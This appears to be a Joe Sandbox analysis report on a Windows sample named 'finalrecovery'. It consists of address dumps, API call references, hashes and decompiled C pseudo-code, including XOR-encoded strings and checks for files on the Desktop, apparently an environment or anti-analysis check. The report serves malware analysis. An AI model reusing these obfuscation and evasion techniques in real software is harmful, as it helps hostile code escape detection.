0x004075b7
0x004075bd
0x004075be
0x004075c0
0x004075c6
0x004075dc
0x004075dc
0x004075de
0x004075e3
0x00000000
0x004075c8
0x004075c8
0x004075cb
0x004075d3
0x004075d6
0x00000000
0x00000000
0x00000000
0x00000000
0x004075d6
0x004075c6
0x004071e8
0x004071e8
0x004071f5
0x00407203
0x00407210
0x00407215
0x00407218
0x0040721a
0x0040721e
0x00407223
0x00407228
0x0040722b
0x00407251
0x00407265
0x0040722d
0x00407230
0x00407233
0x00407235
0x00407238
0x0040723a
0x0040723a
0x0040723c
0x00407243
0x00407243
0x00407267
0x0040726d
0x00407274
0x0040727b
0x0040727e
0x00407281
0x00407286
0x0040728b
0x00407292
0x00407299
0x0040729c
0x004072a2
0x004072a5
0x004072d6
0x004072d6
0x004072dc
0x004072e6
0x004072f0
0x004072f7
0x004072fa
0x0040732b
0x0040732b
0x00407331
0x0040733b
0x00407345
0x0040734c
0x0040734f
0x00407380
0x00407380
0x00407386
0x00407390
0x0040739a
0x004073a1
0x004073a4
0x00000000
0x004073aa
0x004073aa
0x004073b0
0x004073b1
0x004073b3
0x004073b9
0x00000000
0x004073bf
0x004073bf
0x004073c2
0x004073ca
0x004073cd
0x00000000
0x004073d3
0x00000000
0x004073d3
0x004073cd
0x004073b9
0x00407351
0x00407351
0x00407357
0x00407358
0x0040735a
0x00407360
0x00407376
0x00407376
0x00407378
0x0040737d
0x00000000
0x00407362
0x00407362
0x00407365
0x0040736d
0x00407370
0x00000000
0x00000000
0x00000000
0x00000000
0x00407370
0x00407360
0x004072fc
0x004072fc
0x00407302
0x00407303
0x00407305
0x0040730b
0x00407321
0x00407321
0x00407323
0x00407328
0x00000000
0x0040730d
0x0040730d
0x00407310
0x00407318
0x0040731b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040731b
0x0040730b
0x004072a7
0x004072a7
0x004072ad
0x004072ae
0x004072b0
0x004072b6
0x004072cc
0x004072cc
0x004072ce
0x004072d3
0x00000000
0x004072b8
0x004072b8
0x004072bb
0x004072c3
0x004072c6
0x00000000
0x00000000
0x00000000
0x00000000
0x004072c6
0x004072b6
0x004072a5
0x00407179
0x00407179
0x0040717f
0x00407180
0x00407182
0x00407188
0x0040719e
0x0040719e
0x004071a0
0x004071a5
0x00000000
0x0040718a
0x0040718a
0x0040718d
0x00407195
0x00407198
0x00000000
0x00000000
0x00000000
0x00000000
0x00407198
0x00407188
0x00407120
0x00407120
0x00407126
0x00407127
0x00407129
0x0040712f
0x00407145
0x00407145
0x00407147
0x0040714c
0x00000000
0x00407131
0x00407131
0x00407134
0x0040713c
0x0040713f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040713f
0x0040712f
0x004070c7
0x004070c7
0x004070cd
0x004070ce
0x004070d0
0x004070d6
0x004070ec
0x004070ec
0x004070ee
0x004070f3
0x00000000
0x004070d8
0x004070d8
0x004070db
0x004070e3
0x004070e6
0x00000000
0x00000000
0x00000000
0x00000000
0x004070e6
0x004070d6
0x00406cca
0x00406cca
0x00406cd7
0x00406ce5
0x00406cf2
0x00406cf7
0x00406cfa
0x00406cfc
0x00406d00
0x00406d05
0x00406d0d
0x00406d33
0x00406d47
0x00406d0f
0x00406d12
0x00406d15
0x00406d1a
0x00406d1c
0x00406d1c
0x00406d1e
0x00406d25
0x00406d25
0x00406d49
0x00406d4f
0x00406d56
0x00406d5d
0x00406d60
0x00406d63
0x00406d68
0x00406d6d
0x00406d74
0x00406d7b
0x00406d7e
0x00406d87
0x00406db8
0x00406db8
0x00406dbe
0x00406dc8
0x00406dd2
0x00406ddc
0x00406e0d
0x00406e0d
0x00406e13
0x00406e1d
0x00406e27
0x00406e31
0x00406e62
0x00406e62
0x00406e68
0x00406e72
0x00406e7c
0x00406e86
0x00406eb7
0x00406eb7
0x00406ec1
0x00406ecb
0x00406ed2
0x00406ed2
0x00406edb
0x00408cc5
0x00408cca
0x00408cd2
0x00408cd3
0x00408ce4
0x00406ee1
0x00406ee1
0x00406ee7
0x00406ee8
0x00406ef0
0x00408869
0x00408869
0x0040886b
0x00000000
0x00406ef6
0x00406ef6
0x00406ef9
0x00406f04
0x00000000
0x00406f0a
0x00000000
0x00406f0a
0x00406f04
0x00406ef0
0x00406e88
0x00406e88
0x00406e8e
0x00406e8f
0x00406e97
0x00406ead
0x00406ead
0x00406eaf
0x00406eb4
0x00000000
0x00406e99
0x00406e99
0x00406e9c
0x00406ea7
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ea7
0x00406e97
0x00406e33
0x00406e33
0x00406e39
0x00406e3a
0x00406e42
0x00406e58
0x00406e58
0x00406e5a
0x00406e5f
0x00000000
0x00406e44
0x00406e44
0x00406e47
0x00406e52
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e52
0x00406e42
0x00406dde
0x00406dde
0x00406de4
0x00406de5
0x00406ded
0x00406e03
0x00406e03
0x00406e05
0x00406e0a
0x00000000
0x00406def
0x00406def
0x00406df2
0x00406dfd
0x00000000
0x00000000
0x00000000
0x00000000
0x00406dfd
0x00406ded
0x00406d89
0x00406d89
0x00406d8f
0x00406d90
0x00406d98
0x00406dae
0x00406dae
0x00406db0
0x00406db5
0x00000000
0x00406d9a
0x00406d9a
0x00406d9d
0x00406da8
0x00000000
0x00000000
0x00000000
0x00000000
0x00406da8
0x00406d98
0x00406d87
0x00406c5b
0x00406c5b
0x00406c61
0x00406c62
0x00406c6a
0x00406c80
0x00406c80
0x00406c82
0x00406c87
0x00000000
0x00406c6c
0x00406c6c
0x00406c6f
0x00406c7a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c7a
0x00406c6a
0x00406c02
0x00406c02
0x00406c08
0x00406c09
0x00406c11
0x00406c27
0x00406c27
0x00406c29
0x00406c2e
0x00000000
0x00406c13
0x00406c13
0x00406c16
0x00406c21
0x00408ce5
0x00408ce5
0x00408cea
0x00408cea
0x00408cef
0x00408cef
0x00408cf4
0x00408cf5
0x00408cf6
0x00408cf7
0x00408cf8
0x00408cf9
0x00408cfa
0x00408cfb
0x00408cfc
0x00408cfd
0x00408cfe
0x00408cff
0x00408d00
0x00408d01
0x00408d03
0x00408d05
0x00408d10
0x00408d11
0x00408d17
0x00408d1c
0x00408d1e
0x00408d21
0x00408d22
0x00408d23
0x00408d24
0x00408d28
0x00408d2e
0x00408d35
0x00408d3a
0x00408d40
0x00408d42
0x00408d44
0x00408d50
0x00408d50
0x00408d55
0x00408d58
0x00408d5f
0x00408d66
0x00408d66
0x00408d50
0x00408d73
0x00408d78
0x00408d8f
0x00408d96
0x00408dad
0x00408db4
0x00408db8
0x00408dcb
0x00408dd6
0x00408de0
0x00408deb
0x00408df8
0x00408e03
0x00408e0d
0x00408e18
0x00408e22
0x00408e31
0x00408e38
0x00408e3d
0x00408e46
0x00408e51
0x00408e5c
0x00408e67
0x00408e72
0x00408e7d
0x00408e88
0x00408e8c
0x00408e91
0x00408e91
0x00408e93
0x00408ea0
0x00408ea3
0x00408ea4
0x00408eaa
0x00408eb0
0x00408eb5
0x00408eb7
0x00000000
0x00000000
0x00408ec8
0x00408ecd
0x00408ed5
0x00408eda
0x00408edc
0x00408ede
0x00408ee6
0x00408eeb
0x00408eed
0x00408eef
0x00408ef2
0x00000000
0x00408ef2
0x00408eed
0x00408f2e
0x00408f36
0x00408f3b
0x00408f3e
0x00408f48
0x00408f4d
0x00408f51
0x00408f64
0x00408f6a
0x00408f6f
0x00408f79
0x00408f7e
0x00408f83
0x00408f93
0x00408f9e
0x00408fa0
0x00408fab
0x00408faf
0x00408fb4
0x00408fb6
0x00000000
0x00000000
0x00408fc7
0x00408fcf
0x00408fd4
0x00408fd7
0x00000000
0x00000000
0x00408fd9
0x00408fdc
0x00000000
0x00000000
0x00408fea
0x00408ff3
0x00408ff3
0x00408ff5
0x00408ffa
0x00409000
0x00409001
0x0040901a
0x00409020
0x00409025
0x0040902f
0x00409034
0x00409039
0x00409049
0x00409056
0x00409061
0x00409065
0x0040906a
0x0040906c
0x00000000
0x00409072
0x0040907d
0x0040907f
0x00409082
0x00000000
0x00409088
0x00409096
0x00409097
0x0040909f
0x004090a2
0x004090ac
0x004090c5
0x004090c6
0x004090cb
0x004090ce
0x004090da
0x004090ea
0x004090f8
0x00409102
0x00409107
0x0040910a
0x00409110
0x00409117
0x0040912d
0x00409133
0x00409135
0x0040913c
0x0040913c
0x00409140
0x0040915c
0x0040915e
0x00409161
0x00409167
0x0040916c
0x0040916e
0x00409170
0x00409175
0x00409175
0x00409178
0x0040917b
0x0040917d
0x00409183
0x00409183
0x00409186
0x00409189
0x00409194
0x00409197
0x00000000
0x00000000
0x00000000
0x00000000
0x0040918b
0x0040918b
0x0040918e
0x00409190
0x00409190
0x00409199
0x00409199
0x0040919b
0x00000000
0x0040919d
0x0040919d
0x004091a0
0x004091c4
0x00000000
0x00000000
0x00000000
0x004091a0
0x0040919b
0x00000000
0x004091a2
0x004091a2
0x004091ad
0x004091b0
0x004091b1
0x004091b7
0x004091b9
0x004091b9
0x00000000
0x00000000
0x00000000
0x00409117
0x00409082
0x004091c6
0x004091c6
0x004091cb
0x004091cc
0x004091cd
0x004091ce
0x004091cf
0x004091d0
0x004091d1
0x004091d6
0x004091dd
0x004091e6
0x004091ed
0x004091f4
0x004091fa
0x004091fc
0x00409201
0x00409207
0x0040920e
0x00409216
0x0040921d
0x0040921f
0x0040922a
0x00409236
0x0040923b
0x00409243
0x00409249
0x00409253
0x00409258
0x0040921d
0x00409263
0x0040926d
0x00000000
0x00409119
0x00409119
0x0040911f
0x0040911f
0x00000000
0x00408fde
0x00408fe3
0x00408fe3
0x00408ef7
0x00408ef7
0x00408efd
0x00408f1a
0x00408f24
0x00408eff
0x00408eff
0x00408f04
0x00408f14
0x00408f14
0x00408efd
0x00000000
0x00000000
0x00000000
0x00406c21
0x00406c11
0x00406c00
0x00000000

APIs

Part of subcall function 004065E0: GetCurrentProcess.KERNEL32(00000008,?), ref: 00406603
Part of subcall function 004065E0: OpenProcessToken.ADVAPI32(00000000), ref: 0040660A
Part of subcall function 004065E0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,0000004C,?), ref: 00406623
Part of subcall function 004065E0: CloseHandle.KERNEL32(?), ref: 00406630

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,8E1B5714,?,00000000), ref: 00406B37
__Init_thread_footer.LIBCMT ref: 00407ED3

Strings

.exe, xrefs: 004068BF, 00406D2E, 0040724C, 0040773C, 00407C1C, 004081AD, 004086BC, 00408BCC
KC^., xrefs: 00408887
OCjO, xrefs: 0040836F
\AI\, xrefs: 00408365

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: ProcessToken$CloseCurrentFolderHandleInformationInit_thread_footerOpenPath
String ID: .exe$KC^.$OCjO$\AI\
API String ID: 3622068345-289448123
Opcode ID: 573cf72f89ff939cd34783fc97c4e04faa8ce1a40c8cb47262be6b3a3e9afc35
Instruction ID: 0ba5cc549249c3f38757da98882073f7fe0bf54fff609753a258d5d1516a3b56
Opcode Fuzzy Hash: 573cf72f89ff939cd34783fc97c4e04faa8ce1a40c8cb47262be6b3a3e9afc35
Instruction Fuzzy Hash: C4C226709002589BEB25DB24CE447DDBB71AF56308F1082EED4487B2D2DB799BC8CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00402C00 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 113
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00402C00(void* __ebx, intOrPtr* __ecx, void** __edx) {
				signed int _v8;
				long _v12;
				char _v16;
				void* __edi;
				void* __esi;
				signed int _t31;
				long _t45;
				void* _t49;
				signed int _t60;
				signed int _t63;
				intOrPtr* _t64;
				signed int _t71;
				char _t72;
				void* _t77;
				long _t79;
				void* _t80;
				signed int _t81;
				void* _t82;
				signed int _t84;

				_t76 = __edx;
				_t64 = __ecx;
				_t62 = __ebx;
				_t31 =  *0x43d054; // 0x8e1b5714
				_v8 = _t31 ^ _t84;
				_t79 = __edx[2];
				if(_t79 == 0) {
					L8:
					_t16 =  &_v8; // 0x403426
					return E0040EB3F(1, _t62,  *_t16 ^ _t84, _t76, _t79, _t80);
				} else {
					_t81 = __edx[3];
					if((_t81 & 0x02000000) == 0) {
						_t71 =  *(0x439848 + ((_t81 >> 0x1f) + ((_t81 >> 0x0000001e & 0x00000001) + (_t81 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
						_t80 = _t81 & 0x04000000;
						_t44 =  ==  ? _t71 : _t71 | 0x00000200;
						_t45 = VirtualProtect( *__edx, _t79,  ==  ? _t71 : _t71 | 0x00000200,  &_v12); // executed
						if(_t45 != 0) {
							goto L8;
						} else {
							FormatMessageA(0x1300, 0, GetLastError(), 0x400,  &_v16, _t45, _t45);
							_t72 = _v16;
							_t77 = _t72 + 1;
							do {
								_t49 =  *_t72;
								_t72 = _t72 + 1;
							} while (_t49 != 0);
							_t82 = LocalAlloc(0x40, _t72 - _t77 + 0x1f);
							E00402B30(_t82, "%s: %s", "Error protecting memory page");
							OutputDebugStringA(_t82);
							LocalFree(_t82);
							LocalFree(_v16);
							_t30 =  &_v8; // 0x403426
							return E0040EB3F(0, __ebx,  *_t30 ^ _t84, _t77, _t79, LocalFree, _v16);
						}
					} else {
						_t80 =  *__edx;
						if(_t80 == __edx[1]) {
							_push(__ebx);
							if(__edx[4] != 0) {
								L6:
								 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x20))))(_t80, _t79, 0x4000,  *((intOrPtr*)(_t64 + 0x34))); // executed
							} else {
								_t63 =  *(__ecx + 0x3c);
								if( *((intOrPtr*)( *__ecx + 0x38)) == _t63) {
									goto L6;
								} else {
									_t60 = _t79;
									_t76 = _t60 % _t63;
									if(_t60 % _t63 == 0) {
										goto L6;
									}
								}
							}
							_pop(_t62);
						}
						goto L8;
					}
				}
			}

0x00402c00
0x00402c00
0x00402c00
0x00402c06
0x00402c0d
0x00402c12
0x00402c17
0x00402c5a
0x00402c60
0x00402c6d
0x00402c19
0x00402c19
0x00402c22
0x00402c89
0x00402c9b
0x00402ca1
0x00402ca8
0x00402cb0
0x00000000
0x00402cb2
0x00402ccb
0x00402cd1
0x00402cd4
0x00402cd7
0x00402cd7
0x00402cd9
0x00402cda
0x00402cef
0x00402cfc
0x00402d05
0x00402d12
0x00402d17
0x00402d19
0x00402d2a
0x00402d2a
0x00402c24
0x00402c24
0x00402c29
0x00402c2f
0x00402c30
0x00402c46
0x00402c53
0x00402c32
0x00402c34
0x00402c3a
0x00000000
0x00402c3c
0x00402c3e
0x00402c40
0x00402c44
0x00000000
0x00000000
0x00402c44
0x00402c3a
0x00402c58
0x00402c58
0x00000000
0x00402c29
0x00402c22

APIs

VirtualProtect.KERNELBASE(?,?,?,?,00000000,?,?,?,00403426), ref: 00402CA8
GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,00403426), ref: 00402CBD
FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,00403426), ref: 00402CCB
LocalAlloc.KERNEL32(00000040,?,?,?,00403426), ref: 00402CE6
OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,00403426), ref: 00402D05
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00403426), ref: 00402D12
LocalFree.KERNEL32(?,?,?,?,?,?,?,00403426), ref: 00402D17

Strings

&4@, xrefs: 00402C60, 00402D19
%s: %s, xrefs: 00402CF6
Error protecting memory page, xrefs: 00402CF1

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
String ID: %s: %s$&4@$Error protecting memory page
API String ID: 839691724-739521694
Opcode ID: c2079616923152017866c99c88d1a440d5c2c87e5d9d2a5438ffe23e48aa1e51
Instruction ID: 0bf89dc65ae551d437951f66d19f4431ae4be372f2ffc18bb80577c5e10a3953
Opcode Fuzzy Hash: c2079616923152017866c99c88d1a440d5c2c87e5d9d2a5438ffe23e48aa1e51
Instruction Fuzzy Hash: 10312331B00114AFEB14AF69DC45FAEB769EF45700F4401AAE901AB2D1CAB5AD02CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404840 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 335
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00404840(void* __ebx, void* __ecx) {
				intOrPtr _v8;
				int _v16;
				char _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				long _v56;
				int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				long _v76;
				char _v77;
				char _v78;
				char _v84;
				long _v88;
				int _v92;
				char _v93;
				signed int _v100;
				intOrPtr _v104;
				int _v108;
				long _v112;
				int _v116;
				int _v128;
				int _v132;
				int _v136;
				char _v144;
				signed int _v152;
				char _v296;
				char _v300;
				char _v304;
				char _v552;
				intOrPtr _v1580;
				int _v1588;
				int _v1592;
				long _v1596;
				int _v1600;
				int _v1616;
				struct HKL__* _v1684;
				signed int _v1688;
				int _v1692;
				int _v1728;
				intOrPtr _v1748;
				char _v1756;
				signed int _v1760;
				intOrPtr _v1772;
				intOrPtr _v1776;
				signed int _v1780;
				intOrPtr _v1816;
				intOrPtr _v1820;
				signed int _v1872;
				char _v2122;
				short _v2124;
				int* _v2140;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t208;
				signed int _t209;
				intOrPtr _t212;
				intOrPtr _t213;
				intOrPtr* _t217;
				intOrPtr _t218;
				intOrPtr _t223;
				signed char _t224;
				signed char _t225;
				void* _t227;
				intOrPtr _t228;
				signed char _t229;
				intOrPtr _t230;
				void* _t232;
				intOrPtr _t233;
				intOrPtr _t234;
				void* _t236;
				int _t239;
				signed int _t245;
				signed int _t246;
				signed int _t249;
				int _t252;
				intOrPtr* _t254;
				int _t258;
				int _t260;
				signed int _t266;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t278;
				signed int _t284;
				short _t286;
				signed int _t291;
				signed int _t297;
				intOrPtr _t302;
				signed char _t303;
				signed char* _t304;
				void* _t309;
				long _t310;
				intOrPtr _t311;
				int _t312;
				intOrPtr _t316;
				intOrPtr _t317;
				int _t318;
				int _t322;
				void* _t326;
				signed int _t327;
				void* _t333;
				int _t350;
				signed int _t355;
				void* _t361;
				int* _t363;
				signed int _t365;
				int _t366;
				void* _t367;
				void* _t369;
				intOrPtr* _t370;
				intOrPtr* _t373;
				signed char* _t377;
				intOrPtr* _t381;
				intOrPtr* _t385;
				int _t393;
				signed int _t399;
				int _t401;
				int _t404;
				signed int* _t405;
				signed int _t415;
				intOrPtr* _t416;
				signed int _t422;
				int _t426;
				void* _t427;
				long _t429;
				int* _t431;
				int* _t432;
				int* _t433;
				long _t434;
				void* _t435;
				void* _t439;
				signed char* _t440;
				void* _t441;
				int _t443;
				void* _t444;
				signed int _t445;
				void* _t446;
				signed int _t447;
				void* _t448;
				int* _t449;
				void* _t450;
				void* _t451;
				int _t452;
				signed char* _t453;
				void* _t454;
				void* _t455;
				void* _t456;
				int _t457;
				void* _t458;
				void* _t459;
				signed int _t460;
				void* _t462;
				void* _t463;
				int _t464;
				void* _t467;
				signed int _t470;
				signed int _t473;
				signed int _t475;
				signed int _t477;
				void* _t479;
				signed int _t482;
				void* _t483;
				int* _t484;
				int* _t485;
				int* _t486;
				int* _t487;
				int* _t488;
				int* _t489;
				signed int _t495;
				signed int _t496;
				void* _t499;
				signed int _t501;

				_t369 = __ecx;
				_push(__ebx);
				_t361 = _t479;
				_t482 = (_t479 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t361 + 4));
				_t470 = _t482;
				_push(0xffffffff);
				_push(0x42c495);
				_push( *[fs:0x0]);
				_push(_t361);
				_t483 = _t482 - 0x50;
				_t208 =  *0x43d054; // 0x8e1b5714
				_t209 = _t208 ^ _t470;
				_v32 = _t209;
				_push(_t451);
				_push(_t209);
				 *[fs:0x0] =  &_v24;
				_v48 = 0x7c6b7d7b;
				_v44 = 0x68617c7e;
				_v40 = 0x2e6b6267;
				_t443 =  *( *[fs:0x2c]);
				_t212 =  *0x450ecc; // 0x8000000b
				if(_t212 >  *((intOrPtr*)(_t443 + 4))) {
					E0040EEC8(_t212, 0x450ecc);
					_t483 = _t483 + 4;
					_t512 =  *0x450ecc - 0xffffffff;
					if( *0x450ecc == 0xffffffff) {
						asm("movq xmm0, [ebp-0x24]");
						asm("movq [0x450e50], xmm0");
						 *0x450e58 = _v40;
						E0040F1DA(_t369, _t512, 0x42ce40);
						E0040EE7E(0x450ecc);
						_t483 = _t483 + 8;
					}
				}
				if( *0x450e5b != 0) {
					_t355 = 0;
					do {
						 *(_t355 + 0x450e50) =  *(_t355 + 0x450e50) ^ 0x0000002e;
						_t355 = _t355 + 1;
					} while (_t355 < 0xc);
				}
				_t370 = 0x450e50;
				_v108 = 0;
				_v92 = 0;
				_v88 = 0xf;
				_v108 = 0;
				_t16 = _t370 + 1; // 0x450e51
				_t427 = _t16;
				do {
					_t213 =  *_t370;
					_t370 = _t370 + 1;
				} while (_t213 != 0);
				E004026C0(_t361,  &_v108, 0x450e50, _t370 - _t427);
				_v16 = 0;
				_t216 =  >=  ? _v108 :  &_v108;
				_t217 = E00418AE5(_t361, _t443, _t451,  >=  ? _v108 :  &_v108,  >=  ? _v108 :  &_v108);
				_t428 = _t217;
				_v76 = 0;
				_t373 = _t217;
				_v60 = 0;
				_t484 = _t483 + 4;
				_v56 = 0xf;
				_v76 = 0;
				_t26 = _t373 + 1; // 0x1
				_t452 = _t26;
				do {
					_t218 =  *_t373;
					_t373 = _t373 + 1;
				} while (_t218 != 0);
				E004026C0(_t361,  &_v76, _t428, _t373 - _t452);
				_v16 = 2;
				_t429 = _v88;
				if(_t429 < 0x10) {
					L14:
					_t376 = _v60;
					_v92 = 0;
					_v88 = 0xf;
					_v108 = 0;
					_push(8);
					_push("\\Desktop");
					if(_v56 - _t376 < 8) {
						_v84 = 0;
						_t376 =  &_v76;
						_push(_v84);
						_push(8);
						E00402990(_t361,  &_v76, _t443, _t452);
					} else {
						_t38 = _t376 + 8; // 0x8
						_t466 =  >=  ? _v76 :  &_v76;
						_t467 = ( >=  ? _v76 :  &_v76) + _t376;
						_v60 = _t38;
						_push(_t467);
						E00410440();
						_t484 =  &(_t484[3]);
						 *((char*)(_t467 + 8)) = 0;
					}
					_t223 =  *0x450ee0; // 0x8000000c
					_v44 = 0x4b426d6d;
					_v40 = 0x5c4b404f;
					_v77 = 0x2e;
					if(_t223 >  *((intOrPtr*)(_t443 + 4))) {
						E0040EEC8(_t223, 0x450ee0);
						_t484 =  &(_t484[1]);
						_t526 =  *0x450ee0 - 0xffffffff;
						if( *0x450ee0 == 0xffffffff) {
							asm("movq xmm0, [ebp-0x20]");
							asm("movq [0x450f24], xmm0");
							 *0x450f2c = _v77;
							E0040F1DA(_t376, _t526, 0x42ce20);
							E0040EE7E(0x450ee0);
							_t484 =  &(_t484[2]);
						}
					}
					_t224 =  *0x450f2c; // 0x0
					if(_t224 != 0) {
						 *0x450f24 =  *0x450f24 ^ 0x0000002e;
						 *0x450f25 =  *0x450f25 ^ 0x0000002e;
						 *0x450f26 =  *0x450f26 ^ 0x0000002e;
						 *0x450f27 =  *0x450f27 ^ 0x0000002e;
						 *0x450f28 =  *0x450f28 ^ 0x0000002e;
						 *0x450f29 =  *0x450f29 ^ 0x0000002e;
						 *0x450f2a =  *0x450f2a ^ 0x0000002e;
						 *0x450f2b =  *0x450f2b ^ 0x0000002e;
						 *0x450f2c = _t224 ^ 0x0000002e;
					}
					_t485 = _t484 - 0x18;
					_t377 = 0x450f24;
					_t431 = _t485;
					_t50 =  &(_t377[1]); // 0x450f25
					_t453 = _t50;
					 *_t431 = 0;
					_t431[4] = 0;
					_t431[5] = 0xf;
					do {
						_t225 =  *_t377;
						_t377 =  &(_t377[1]);
					} while (_t225 != 0);
					E004026C0(_t361, _t431, 0x450f24, _t377 - _t453);
					_t227 = E00404490(_t361,  &_v76, _t431); // executed
					_t486 =  &(_t485[6]);
					_v77 = 0x2e;
					_t228 =  *0x450f84; // 0x8000000d
					_v78 = _t227 != 0;
					if(_t228 >  *((intOrPtr*)(_t443 + 4))) {
						E0040EEC8(_t228, 0x450f84);
						_t486 =  &(_t486[1]);
						_t532 =  *0x450f84 - 0xffffffff;
						if( *0x450f84 == 0xffffffff) {
							asm("movaps xmm0, [0x439d60]");
							asm("movups [0x450e8c], xmm0");
							 *0x450e9c = _v77;
							E0040F1DA( &_v76, _t532, 0x42ce00);
							E0040EE7E(0x450f84);
							_t486 =  &(_t486[2]);
						}
					}
					_t229 =  *0x450e9c; // 0x0
					if(_t229 != 0) {
						asm("movups xmm0, [0x450e8c]");
						asm("movaps xmm1, [0x439d20]");
						asm("pxor xmm1, xmm0");
						 *0x450e9c = _t229 ^ 0x0000002e;
						asm("movups [0x450e8c], xmm1");
					}
					_t487 = _t486 - 0x18;
					_t381 = 0x450e8c;
					_t432 = _t487;
					_t58 = _t381 + 1; // 0x450e8d
					_t454 = _t58;
					 *_t432 = 0;
					_t432[4] = 0;
					_t432[5] = 0xf;
					do {
						_t230 =  *_t381;
						_t381 = _t381 + 1;
					} while (_t230 != 0);
					E004026C0(_t361, _t432, 0x450e8c, _t381 - _t454);
					_t232 = E00404490(_t361,  &_v76, _t432); // executed
					_t488 =  &(_t487[6]);
					_v36 = 0x2e6d;
					_t233 =  *0x450ee4; // 0x8000000e
					_v77 = _t232 != 0;
					if(_t233 >  *((intOrPtr*)(_t443 + 4))) {
						E0040EEC8(_t233, 0x450ee4);
						_t488 =  &(_t488[1]);
						_t537 =  *0x450ee4 - 0xffffffff;
						if( *0x450ee4 == 0xffffffff) {
							asm("movaps xmm0, [0x439d90]");
							asm("movups [0x450f54], xmm0");
							 *0x450f64 = _v36;
							E0040F1DA( &_v76, _t537, 0x42cde0);
							E0040EE7E(0x450ee4);
							_t488 =  &(_t488[2]);
						}
					}
					if( *0x450f65 != 0) {
						asm("movups xmm0, [0x450f54]");
						_t333 = 0x10;
						asm("movaps xmm1, [0x439d20]");
						asm("pxor xmm1, xmm0");
						asm("movups [0x450f54], xmm1");
						do {
							 *(_t333 + 0x450f54) =  *(_t333 + 0x450f54) ^ 0x0000002e;
							_t333 = _t333 + 1;
						} while (_t333 < 0x12);
					}
					_t489 = _t488 - 0x18;
					_t385 = 0x450f54;
					_t433 = _t489;
					_t68 = _t385 + 1; // 0x450f55
					_t455 = _t68;
					 *_t433 = 0;
					_t433[4] = 0;
					_t433[5] = 0xf;
					do {
						_t234 =  *_t385;
						_t385 = _t385 + 1;
					} while (_t234 != 0);
					E004026C0(_t361, _t433, 0x450f54, _t385 - _t455);
					_t236 = E00404490(_t361,  &_v76, _t433); // executed
					_t484 =  &(_t489[6]);
					if(_t236 == 0 || _v78 == 0 || _v77 == 0) {
						_t452 = 0;
						__eflags = 0;
					} else {
						_t452 = 1;
					}
					_t434 = _v56;
					if(_t434 < 0x10) {
						L48:
						 *[fs:0x0] = _v24;
						_pop(_t444);
						_pop(_t456);
						return E0040EB3F(_t452, _t361, _v32 ^ _t470, _t434, _t444, _t456);
					} else {
						_t393 = _v76;
						_t434 = _t434 + 1;
						_t239 = _t393;
						if(_t434 < 0x1000) {
							L47:
							_push(_t434);
							E0040ED7F(_t393);
							goto L48;
						} else {
							_t393 =  *(_t393 - 4);
							_t434 = _t434 + 0x23;
							if(_t239 - _t393 + 0xfffffffc > 0x1f) {
								goto L50;
							} else {
								goto L47;
							}
						}
					}
				} else {
					_t426 = _v108;
					_t441 = _t429 + 1;
					_t350 = _t426;
					if(_t441 < 0x1000) {
						L13:
						_push(_t441);
						E0040ED7F(_t426);
						_t484 =  &(_t484[2]);
						goto L14;
					} else {
						_t393 =  *(_t426 - 4);
						_t434 = _t441 + 0x23;
						if(_t350 - _t393 + 0xfffffffc > 0x1f) {
							E004134A7(_t361, _t434, __eflags);
							L50:
							E004134A7(_t361, _t434, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t361);
							_t363 = _t484;
							_t495 = (_t484 - 0x00000008 & 0xfffffff8) + 4;
							_push(_t470);
							_v128 = _t363[1];
							_t473 = _t495;
							_push(0xffffffff);
							_push(0x42c4f2);
							_push( *[fs:0x0]);
							_push(_t363);
							_t496 = _t495 - 0x630;
							_t245 =  *0x43d054; // 0x8e1b5714
							_t246 = _t245 ^ _t473;
							_v152 = _t246;
							_push(_t452);
							_push(_t443);
							_push(_t246);
							 *[fs:0x0] =  &_v144;
							_t457 = _t393;
							_v1688 = _t457;
							_v1728 = _t457;
							asm("xorps xmm0, xmm0");
							_v1692 = 0;
							asm("movq [esi], xmm0");
							 *(_t457 + 8) = 0;
							 *_t457 = 0;
							 *(_t457 + 4) = 0;
							 *(_t457 + 8) = 0;
							_v136 = 0;
							_v1692 = 1;
